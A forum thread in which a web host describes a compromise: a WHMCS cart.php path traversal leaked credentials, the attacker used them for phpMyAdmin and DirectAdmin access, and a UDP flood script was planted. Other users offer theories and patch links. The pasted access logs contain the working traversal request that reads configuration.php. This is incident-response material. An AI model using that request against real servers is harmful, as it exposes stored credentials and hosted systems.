Serious Direct Admin Security Concerns + UDP Attack Script Installed

pucky

The past 24 hours have been interesting and I'm now convinced that DirectAdmin has some serious security flaw that allows a person to gain access to the DirectAdmin account.

It started at around this time last night. I was watching my log file using tail when suddenly I noticed an IP address loading up phpMyAdmin and browsing all the databases on the server using my phpMyAdmin username.

What was interesting is, he executed a traversal attack command and viewed my WHMCS configuration.php file to get access to my username and password. My bad, I didn't patch the cart.php vuln in WHMCS and that's how he got that info.

I knocked him offline, changed my admin password to a 15 character password and banned his IP subnet, Israel, not that it mattered. All my DBs seem to be fine but only time will tell. I'm not going to pick through every DB and table to see what he changed, if anything. I think he was mainly interested in passwords and I know that WHMCS passwords are all encrypted. Who knows about the others. I also applied the patch and went off to bed.

Today, I'm logged into SSH and get kicked off about 20 times. Very unusual. Just as I was starting to get annoyed I get a system message stating that my /var partition is 97% full.

HUH! How can that be possible? Upon investigating I find a 17 gig error file in /var/log/httpd/domains/* that is way too large. When I look at it I find a script called errorlog.php installed in one of my WordPress sites under the admin account.

The script was a UDP attack script. People were loading it up all day and attacking other hosts/websites. Every time it got too much for the system, I got booted from SSH.

When I log in to admin and review the stats for 2 domains under my admin account I find that this Mfer logged into my admin account on 2 occasions. Both logins are recorded including his IP address. Now it was easy for him to use file manager to drop that script into my cgi-bin, which btw was actually a .php file.

The million dollar question now is the method of password retrieval.

If a user violates your DB using phpMyAdmin there is no possible way for him to get my admin password. My admin password was not the same password as my phpMyAdmin login. He did not execute a command to retrieve the password file. I don't see that he did, and even so, mod security would have caught him and there is no way to get the admin password from any of the DBs.

So how was he able to grab a 12 character, very difficult to remember password and use it to violate my admin account? Maybe this would be a question for DA. I find that unless there are other security issues with DA this was not possible.

He didn't sit there all day trying to guess the login, and all my logins are via SSL btw. There are no keyloggers installed. How was this done? I can't see how he gained admin status, a mystery that has been written about before but unresolved.

Thanks
 
My guess is that he changed the md5 value of the WHMCS admin password and from WHMCS (dunno if it is possible, I'm just thinking) he changed the DirectAdmin admin password.

I could be totally wrong of course, but this is my guess.

DA doesn't save its passwords in MySQL but in passwd files (OS level), so I don't see any relation between phpMyAdmin and the SSH password at all, but I could be wrong somehow.

Maybe someone else will reply with other ideas.

Regards
 
Well, I don't see that's possible. Here is why. I was using the same WHMCS password to log in. It worked, then I changed the password.
When I logged into admin I used my old password and then I changed the password. If he had changed it I would not have been able to log in to both locations.

Also, he didn't get my SSH password, just my DirectAdmin login to admin password.
 
I see your point; as I said, mine were just suggestions.. but.. unless you disable it, user admin in DirectAdmin actually has SSH access too

Regards
 
With the first exploit of the cart.php, did he have the chance to get access to DA/FTP/SSH? If so, he could then have modified WHMCS files or could have uploaded other shell scripts.

edit: But anyway, since he had access to admin, your whole system isn't safe anymore. Who knows what he did where.

Also, does WHMCS still require register globals to be enabled? It looks like that's the cause of this exploit.
 
Admin user is not allowed to SSH to the box so he couldn't get in there. He didn't try it according to my logs. He went straight to admin though.

That exploit was unknown to me until I visited the WHMCS forum. There are about 3 patches I added. Register globals is off. Still, I have no idea how he got my admin pw by logging into phpMyAdmin. This is the big mystery unless there is an exploit with logging into DA that we are unaware of.
 
Since he first exploited whmcs it makes sense that it began there. If he could've logged into admin by a DA exploit he would've done that right away.

And I'm no whmcs user as well, but if admin details are stored in whmcs then that's probably where he got in. The password may be encrypted, but since whmcs needs to decrypt it to control the DA api it makes sense that the hacker could decrypt it too.
 
That's exactly what I was thinking about.

Since DA needs a "plain" password, either WHMCS has a decrypt key (that the hacker would have found) or it is not encrypted at all (that is also plausible), and that's where the hacker found the key.

Check the DB where the DA admin password is stored and check how it looks; probably it is not md5.

Regards
 
I am a WHMCS user. If the hacker got access to your WHMCS, then he would have access to ALL your servers listed in WHMCS, and he could have logged in as admin in DirectAdmin from the WHMCS panel. The security hole in WHMCS is also discussed in several threads at Webhostingtalk; here are two of the largest threads:

http://www.webhostingtalk.com/showthread.php?t=1105350
and
http://www.webhostingtalk.com/showthread.php?t=1105806

Edit: Here is the thread of the latest patch: http://www.webhostingtalk.com/showthread.php?t=1103716
 
Well, I don't see that's possible. Here is why. I was using the same WHMCS password to log in. It worked, then I changed the password.

What would stop a hacker from putting the old hash of a password back as soon as he got access to your DirectAdmin-powered server?
 
@ditto,

I have not read the threads (I might need to read them), but is it possible to change a location of admin to anything else, for example

from http://whmcs/admin/ to http://whmcs/admin8797jhsdl/ ? Would it work?

Or, maybe set IP based limits in .htaccess and chattr it immutable.

I am a WHMCS user. If the hacker got access to your WHMCS, then he would have access to ALL your servers listed in WHMCS, and he could have logged in as admin in DirectAdmin from the WHMCS panel. The security hole in WHMCS is also discussed in several threads at Webhostingtalk; here are two of the largest threads
 
Yes, you can change the path to the admin folder to any path you like: http://docs.whmcs.com/Further_Security_Steps

But the security issue is bigger than this. If WHMCS is not patched, they send a support ticket to your WHMCS system with some PHP code in the subject of the ticket (it's related to the Smarty template system), and I think the hacker would then have access to read the content of the WHMCS configuration.php file, and others say that they would also get a lot more than that. You are basically losing control of all servers connected to WHMCS. Also, the configuration.php file contains the path to your http://whmcs/adminpath. The security issue is still actively being exploited; every week I get support tickets with the nasty code in the subject.
 
I don't know because I am still running WHMCS 4.5.2, but I would be very surprised if the latest 5.0.3 did not contain the patch. However, here is a user posting on 01-15-2012 saying that the latest WHMCS version did not contain the patch: http://www.webhostingtalk.com/showpost.php?p=7903711&postcount=9 - but I can't believe that is true. He must have misunderstood something.

Edit: The latest WHMCS 5.0.3 does contain the patch: http://forum.whmcs.com/showthread.php?t=43462

* All client area downloads have been updated to include this by default
 
Managed to find his tracks from my log files; I've changed the domain name to mydomain, otherwise it's left untouched.

The 1st two lines are rather interesting. You'll see where you viewed my WHMCS config file further down.

46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /cart.php?a=test&templatefile=../../../configuration.php%00 HTTP/1.1" 200 7928 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

It's right there, which I missed the first time, tblservers <----

Since the server communicates with my server directly and it has to have the admin username and password to do it, that's how he got the admin info. SCARY!

Code:
46.116.94.55 - - [22/Jan/2012:01:47:18 -0800] "GET /cart.php HTTP/1.1" 302 5 "http://www.google.co.il/url?sa=t&rct=j&q=inurl:%22cart.php%22+directadmin&source=web&cd=210&ved=0CGoQFjAJOMgB&url=http%3A%2F%2Fwww.mydomain.com%2Fcart.php&ei=_tobT4OSIZD48QPmotSpCw&usg=AFQjCNFWj-Jp342yQWZUd9WM_XgYaXxhAQ" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:31 -0800] "GET /cart.php HTTP/1.1" 200 39199 "http://www.google.co.il/url?sa=t&rct=j&q=inurl:%22cart.php%22+directadmin&source=web&cd=210&ved=0CGoQFjAJOMgB&url=http%3A%2F%2Fwww.mydomain.com%2Fcart.php&ei=_tobT4OSIZD48QPmotSpCw&usg=AFQjCNFWj-Jp342yQWZUd9WM_XgYaXxhAQ" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_news-slider.css HTTP/1.1" 200 2418 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/extras/coda-slider/coda-slider.css HTTP/1.1" 200 2088 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/extras/ddmenu/ddmenu.css HTTP/1.1" 200 597 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_comparison.css HTTP/1.1" 200 4282 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_common.css HTTP/1.1" 200 9410 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_order.css HTTP/1.1" 200 9333 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/schemes/mydomain/stylesheet.css HTTP/1.1" 200 4820 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/languages/english/language.css HTTP/1.1" 200 1182 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/scheme_milestone.css HTTP/1.1" 200 16930 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/extras/ddmenu/ddmenu.js HTTP/1.1" 200 12858 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/images/yes.gif HTTP/1.1" 200 1024 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/images/no.gif HTTP/1.1" 200 1006 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /includes/jscript/jquery.js HTTP/1.1" 200 57254 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /templates/milestone/extras/coda-slider/jquery.easing.js HTTP/1.1" 200 8097 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /templates/milestone/extras/coda-slider/jquery.coda-slider.js HTTP/1.1" 200 9834 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /templates/milestone/extras/ddmenu/ddmenucontents.js HTTP/1.1" 200 824 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:36 -0800] "GET /templates/milestone/schemes/mydomain/header_bg.gif HTTP/1.1" 200 1572 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/schemes/mydomain/header_domain.gif HTTP/1.1" 200 252 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/images/btn_go.png HTTP/1.1" 200 409 "https://mydomain.com/templates/milestone/scheme_milestone.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /cart.php?a=test&templatefile=../../../configuration.php%00 HTTP/1.1" 200 7928 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/schemes/mydomain/banner_default.jpg HTTP/1.1" 200 17111 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/schemes/mydomain/logo.jpg HTTP/1.1" 200 15320 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/products_980px.jpg HTTP/1.1" 200 21638 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/comparison_tbl_head.gif HTTP/1.1" 200 2823 "https://mydomain.com/templates/milestone/scheme_comparison.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/comparison_tbl_head_right.gif HTTP/1.1" 200 1075 "https://mydomain.com/templates/milestone/scheme_comparison.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/comparison_tbl_body_680px.gif HTTP/1.1" 200 132 "https://mydomain.com/templates/milestone/scheme_comparison.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_default.gif HTTP/1.1" 200 2532 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_separate.gif HTTP/1.1" 200 83 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_bg.gif HTTP/1.1" 200 1850 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/fonts/candarab.ttf HTTP/1.1" 200 226564 "https://mydomain.com/templates/milestone/scheme_milestone.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_bullet.png HTTP/1.1" 200 1058 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/btn_small.gif HTTP/1.1" 200 699 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/header_separate.gif HTTP/1.1" 200 450 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/worldmap.gif HTTP/1.1" 200 8921 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/languages/english/flag.gif HTTP/1.1" 200 1006 "https://mydomain.com/cart.php?a=test&templatefile=../../../configuration.php%00" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/footer_bg.gif HTTP/1.1" 200 902 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:05 -0800] "GET /phpmyadmin HTTP/1.1" 301 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:06 -0800] "GET /phpmyadmin/ HTTP/1.1" 401 1107 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:19 -0800] "GET /phpmyadmin/ HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:20 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 200 758 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:21 -0800] "GET /phpmyadmin/js/common.js?ts=1324498073 HTTP/1.1" 200 5294 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:21 -0800] "GET /phpmyadmin/favicon.ico HTTP/1.1" 200 18902 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:22 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 200 78268 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:23 -0800] "GET /phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 6477 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:23 -0800] "GET /phpmyadmin/phpmyadmin.css.php?token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=left&nocache=5301103624 HTTP/1.1" 200 5881 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:24 -0800] "GET /phpmyadmin/js/navigation.js HTTP/1.1" 200 2521 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/js/functions.js HTTP/1.1" 200 31563 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/logo_left.png HTTP/1.1" 200 4970 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_home.png HTTP/1.1" 200 806 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_loggoff.png HTTP/1.1" 200 688 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_selboard.png HTTP/1.1" 200 698 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_docs.png HTTP/1.1" 200 786 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 30715 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_sqlhelp.png HTTP/1.1" 200 579 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_reload.png HTTP/1.1" 200 608 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/js/config.js?ts=1324498073 HTTP/1.1" 200 9480 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:26 -0800] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624 HTTP/1.1" 200 41756 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:26 -0800] "GET /phpmyadmin/print.css HTTP/1.1" 200 1064 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:26 -0800] "GET /phpmyadmin/js/jquery/jquery.qtip-1.0.0.min.js?ts=1324498073 HTTP/1.1" 200 38434 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/js/functions.js?ts=1324498073 HTTP/1.1" 200 31563 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_import.png HTTP/1.1" 200 629 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_vars.png HTTP/1.1" 200 603 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_asci.png HTTP/1.1" 200 209 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_engine.png HTTP/1.1" 200 468 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_sync.png HTTP/1.1" 200 551 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblops.png HTTP/1.1" 200 610 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_help.png HTTP/1.1" 200 1594 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js HTTP/1.1" 200 78268 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 4954 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_host.png HTTP/1.1" 200 667 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_db.png HTTP/1.1" 200 390 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_sql.png HTTP/1.1" 200 748 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
